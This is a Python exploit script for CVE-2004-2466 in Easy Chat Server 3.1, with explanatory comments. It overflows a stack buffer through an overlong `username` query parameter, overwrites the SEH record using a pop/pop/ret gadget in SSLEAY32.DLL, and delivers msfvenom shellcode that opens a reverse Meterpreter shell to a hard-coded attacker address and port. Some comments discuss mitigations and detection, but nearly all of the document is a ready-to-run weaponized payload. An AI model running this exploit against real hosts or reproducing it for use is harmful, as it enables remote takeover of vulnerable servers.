# Exploit Title: Easy Chat Server 3.1 - Remote Stack Buffer Overflow (SEH)
# Exploit Author: r00tpgp @ http://www.r00tpgp.com
# Usage: python easychat-exploit.py <victim-ip> <port>
# Spawns reverse meterpreter LHOST=192.168.0.162 LPORT=1990
# CVE: CVE-2004-2466
# Installer: http://www.echatserver.com/
# Tested on: Microsoft Windows 11 Pro x86-64 (10.0.22000 N/A Build 22000)
#!/usr/bin/python
import sys, socket, time
# Flat script: builds one HTTP GET whose `username` query value overflows a
# stack buffer in Easy Chat Server and overwrites the SEH record (see the
# header comments above). Written against Python 2 string semantics: every
# "\x.." literal below is treated as raw bytes when handed to the socket.
# No argument validation: a missing argument raises IndexError and a
# non-numeric port raises ValueError before any connection is attempted.
host = sys.argv[1] # Receive IP from user
port = int(sys.argv[2]) # Receive Port from user
#msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.162 LPORT=1990 -f python -b "\x00\x20"
# Encoded payload emitted once by the msfvenom command above; the connect-back
# address (LHOST/LPORT) is baked into these bytes and is not derived from the
# script arguments. `-b "\x00\x20"` excludes NUL and space — presumably because
# the value travels inside an HTTP request line (verify against the target's
# parser). Do not edit individual bytes: the decoder stub depends on them.
buf = ""
buf += "\xbe\x4e\xdd\xd4\x27\xd9\xe9\xd9\x74\x24\xf4\x5b\x29"
buf += "\xc9\xb1\x54\x31\x73\x13\x83\xc3\x04\x03\x73\x41\x3f"
buf += "\x21\xdb\xb5\x3d\xca\x24\x45\x22\x42\xc1\x74\x62\x30"
buf += "\x81\x26\x52\x32\xc7\xca\x19\x16\xfc\x59\x6f\xbf\xf3"
buf += "\xea\xda\x99\x3a\xeb\x77\xd9\x5d\x6f\x8a\x0e\xbe\x4e"
buf += "\x45\x43\xbf\x97\xb8\xae\xed\x40\xb6\x1d\x02\xe5\x82"
buf += "\x9d\xa9\xb5\x03\xa6\x4e\x0d\x25\x87\xc0\x06\x7c\x07"
buf += "\xe2\xcb\xf4\x0e\xfc\x08\x30\xd8\x77\xfa\xce\xdb\x51"
buf += "\x33\x2e\x77\x9c\xfc\xdd\x89\xd8\x3a\x3e\xfc\x10\x39"
buf += "\xc3\x07\xe7\x40\x1f\x8d\xfc\xe2\xd4\x35\xd9\x13\x38"
buf += "\xa3\xaa\x1f\xf5\xa7\xf5\x03\x08\x6b\x8e\x3f\x81\x8a"
buf += "\x41\xb6\xd1\xa8\x45\x93\x82\xd1\xdc\x79\x64\xed\x3f"
buf += "\x22\xd9\x4b\x4b\xce\x0e\xe6\x16\x86\xe3\xcb\xa8\x56"
buf += "\x6c\x5b\xda\x64\x33\xf7\x74\xc4\xbc\xd1\x83\x2b\x97"
buf += "\xa6\x1c\xd2\x18\xd7\x35\x10\x4c\x87\x2d\xb1\xed\x4c"
buf += "\xae\x3e\x38\xf8\xa4\xa8\x03\x55\xb8\x8a\xec\xa4\xb9"
buf += "\xcd\x2a\x21\x5f\x81\xe2\x62\xf0\x61\x53\xc3\xa0\x09"
buf += "\xb9\xcc\x9f\x29\xc2\x06\x88\xc3\x2d\xff\xe0\x7b\xd7"
buf += "\x5a\x7a\x1a\x18\x71\x06\x1c\x92\x70\xf6\xd2\x53\xf0"
buf += "\xe4\x02\x02\xfa\xf4\xd2\xaf\xfa\x9e\xd6\x79\xac\x36"
buf += "\xd4\x5c\x9a\x98\x27\x8b\x98\xdf\xd7\x4a\xa9\x94\xe1"
buf += "\xd8\x95\xc2\x0d\x0d\x16\x13\x5b\x47\x16\x7b\x3b\x33"
buf += "\x45\x9e\x44\xee\xf9\x33\xd0\x11\xa8\xe0\x73\x7a\x56"
buf += "\xde\xb3\x25\xa9\x35\xc0\x22\x55\xcb\xe4\x8a\x3e\x33"
buf += "\xa8\x2a\xbf\x59\x28\x7b\xd7\x96\x07\x74\x17\x56\x82"
buf += "\xdd\x3f\xdd\x42\xaf\xde\xe2\x4f\x71\x7f\xe2\x63\xaa"
buf += "\x96\x6d\x84\x4d\x97\x8f\xb9\x9b\xae\xe5\xfa\x1f\x95"
buf += "\xf6\xb1\x02\xbc\x9c\xb9\x11\xbe\xb4"
# Overflow layout, in the order the pieces are concatenated into the request:
#   junk (217 filler bytes) -> nseh (4) -> seh (4) -> nops (16) -> buf (payload)
# 217 is the distance from the start of the `username` value to the SEH
# record; the next 4 bytes land on the "next SEH" pointer and the 4 after
# that on the handler pointer.
junk = "A"*217
nseh = "\xeb\x06\x90\x90" # short jump 6 bytes
# Handler pointer: author reports a pop/pop/ret gadget at 0x1001AE86 in the
# bundled SSLEAY32.DLL. A fixed address like this only works while that
# module loads at its preferred base and is not SafeSEH-protected — which is
# exactly why DEP/SafeSEH/ASLR-built modules (or retiring the product) are
# the mitigation. NOTE(review): the module base is not verified here; assumed
# stable from the "Tested on" line above.
seh = "\x86\xae\x01\x10" # pop pop ret 1001AE86 SSLEAY32.DLL
nops = "\x90"*16 # landing pad that the short jump in nseh falls into
# Raw HTTP/1.1 request. The Host and Referer values (192.168.1.136) are
# hard-coded and are not tied to the <victim-ip> argument, so they will not
# match the address actually connected to. Detection angle: a single GET to
# /chat.ghp whose `username` value is hundreds of bytes long and contains
# non-printable characters is far outside the normal login shape.
header = (
"GET /chat.ghp?username=" + junk + nseh + seh + nops + buf + "&password=&room=1&sex=1 HTTP/1.1\r\n"
"User-Agent: Mozilla/4.0\r\n"
"Host: 192.168.1.136:80\r\n"
"Accept-Language: en-us\r\n"
"Accept-Encoding: gzip, deflate\r\n"
"Referer: http://192.168.1.136\r\n"
"Connection: Keep-Alive\r\n\r\n"
)
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Declare a TCP socket
client.connect((host, port)) # Connect to user supplied port and IP address; raises socket.error if unreachable
# socket.send() may transmit fewer bytes than requested; the return value is
# not checked and no response is read before the socket is closed.
client.send(header) # Send the user command with a variable length name
client.close() # Close the Connection